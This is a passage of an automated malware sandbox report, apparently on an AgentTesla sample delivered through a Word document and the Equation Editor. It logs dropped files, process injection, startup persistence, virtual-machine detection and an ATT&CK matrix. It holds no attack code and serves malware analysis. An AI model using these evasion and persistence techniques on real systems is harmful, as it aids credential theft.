Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\tthxx.exe C:\Users\user\tthxx.exe	Jump to behavior
Source: C:\Users\user\tthxx.exe	Process created: C:\Users\user\AppData\Local\Temp\tthxx.exe C:\Users\user\AppData\Local\Temp\tthxx.exe	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\tthxx.exe C:\Users\user\tthxx.exe	Jump to behavior

Source: C:\Users\user\tthxx.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\tthxx.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: IMG_05412_868_21.docx

Initial sample: OLE indicators vbamacros = False

Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	Code function: 11_2_002543F5 push edi; ret		11_2_002543F6
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	Code function: 11_2_002543FF push esi; ret		11_2_00254407

Source: initial sample	Static PE information: section name: .text entropy: 7.96408240927
Source: initial sample	Static PE information: section name: .text entropy: 7.96408240927
Source: initial sample	Static PE information: section name: .text entropy: 7.96408240927
Source: initial sample	Static PE information: section name: .text entropy: 7.96408240927

Source: C:\Users\user\tthxx.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\notpad\notpad.exe	Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\tthxx.exe	Jump to dropped file
Source: C:\Users\user\tthxx.exe	File created: C:\Users\user\AppData\Local\Temp\tthxx.exe	Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\44444[1].exe	Jump to dropped file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\user\tthxx.exe

Jump to dropped file

Boot Survival:

Creates an undocumented autostart registry key

Show sources

Source: C:\Users\user\tthxx.exe

Key value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup

Jump to behavior

Drops PE files to the user root directory

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\user\tthxx.exe

Jump to dropped file

Source: C:\Users\user\tthxx.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\notpad			Jump to behavior
Source: C:\Users\user\tthxx.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\notpad\notpad.exe			Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Show sources

Source: C:\Users\user\AppData\Local\Temp\tthxx.exe

WMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Show sources

Source: C:\Users\user\AppData\Local\Temp\tthxx.exe

WMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: tthxx.exe, 00000004.00000002.2241699219.0000000000580000.00000004.00000001.sdmp, tthxx.exe, 00000008.00000002.2243558018.0000000003331000.00000004.00000001.sdmp

Binary or memory string: SBIEDLL.DLL

Source: C:\Users\user\tthxx.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	Window / User API: threadDelayed 9349			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	Window / User API: threadDelayed 398			Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2668	Thread sleep time: -300000s >= -30000s	Jump to behavior
Source: C:\Users\user\tthxx.exe TID: 3036	Thread sleep time: -240000s >= -30000s	Jump to behavior
Source: C:\Users\user\tthxx.exe TID: 2608	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\user\tthxx.exe TID: 2800	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2492	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2184	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2184	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\user\tthxx.exe TID: 2228	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3052	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3052	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2236	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe TID: 2492	Thread sleep time: -240000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe TID: 2492	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe TID: 2440	Thread sleep time: -7378697629483816s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe TID: 2440	Thread sleep time: -120000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe TID: 2396	Thread sleep count: 9349 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe TID: 2396	Thread sleep count: 398 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe TID: 2440	Thread sleep count: 96 > 30	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\tthxx.exe

WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor

Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	Last function: Thread delayed

Source: C:\Users\user\tthxx.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	Thread delayed: delay time: 30000	Jump to behavior

Source: tthxx.exe, 00000008.00000002.2243558018.0000000003331000.00000004.00000001.sdmp

Binary or memory string: vmware

Source: C:\Users\user\tthxx.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\tthxx.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\tthxx.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Allocates memory in foreign processes

Show sources

Source: C:\Users\user\tthxx.exe

Memory allocated: C:\Users\user\AppData\Local\Temp\tthxx.exe base: 400000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\tthxx.exe

Memory written: C:\Users\user\AppData\Local\Temp\tthxx.exe base: 400000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Show sources

Source: C:\Users\user\tthxx.exe	Memory written: C:\Users\user\AppData\Local\Temp\tthxx.exe base: 400000	Jump to behavior
Source: C:\Users\user\tthxx.exe	Memory written: C:\Users\user\AppData\Local\Temp\tthxx.exe base: 402000	Jump to behavior
Source: C:\Users\user\tthxx.exe	Memory written: C:\Users\user\AppData\Local\Temp\tthxx.exe base: 46C000	Jump to behavior
Source: C:\Users\user\tthxx.exe	Memory written: C:\Users\user\AppData\Local\Temp\tthxx.exe base: 46E000	Jump to behavior
Source: C:\Users\user\tthxx.exe	Memory written: C:\Users\user\AppData\Local\Temp\tthxx.exe base: 7EFDE008	Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\tthxx.exe C:\Users\user\tthxx.exe	Jump to behavior
Source: C:\Users\user\tthxx.exe	Process created: C:\Users\user\AppData\Local\Temp\tthxx.exe C:\Users\user\AppData\Local\Temp\tthxx.exe	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\tthxx.exe C:\Users\user\tthxx.exe	Jump to behavior

Source: tthxx.exe, 0000000B.00000002.2344826261.0000000000CF0000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: tthxx.exe, 0000000B.00000002.2344826261.0000000000CF0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: tthxx.exe, 0000000B.00000002.2344826261.0000000000CF0000.00000002.00000001.sdmp	Binary or memory string: !Progman

Source: C:\Users\user\tthxx.exe	Queries volume information: C:\Users\user\tthxx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\tthxx.exe	Queries volume information: C:\Users\user\tthxx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\tthxx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\tthxx.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected AgentTesla

Show sources

Source: Yara match

File source: 0000000B.00000002.2345059510.0000000002461000.00000004.00000001.sdmp, type: MEMORY

Source: Yara match	File source: 0000000B.00000002.2345059510.0000000002461000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: tthxx.exe PID: 2312, type: MEMORY

Remote Access Functionality:

Yara detected AgentTesla

Show sources

Source: Yara match

File source: 0000000B.00000002.2345059510.0000000002461000.00000004.00000001.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation211	Registry Run Keys / Startup Folder11	Process Injection312	Masquerading111	OS Credential Dumping	Security Software Discovery311	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Exploitation for Client Execution12	Boot or Logon Initialization Scripts	Registry Run Keys / Startup Folder11	Disable or Modify Tools1	LSASS Memory	Process Discovery2	Remote Desktop Protocol	Clipboard Data1	Exfiltration Over Bluetooth	Ingress Tool Transfer12	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Virtualization/Sandbox Evasion131	Security Account Manager	Virtualization/Sandbox Evasion131	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Process Injection312	NTDS	Application Window Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol21	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Obfuscated Files or Information3	LSA Secrets	Remote System Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Software Packing2	Cached Domain Credentials	File and Directory Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	System Information Discovery114	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
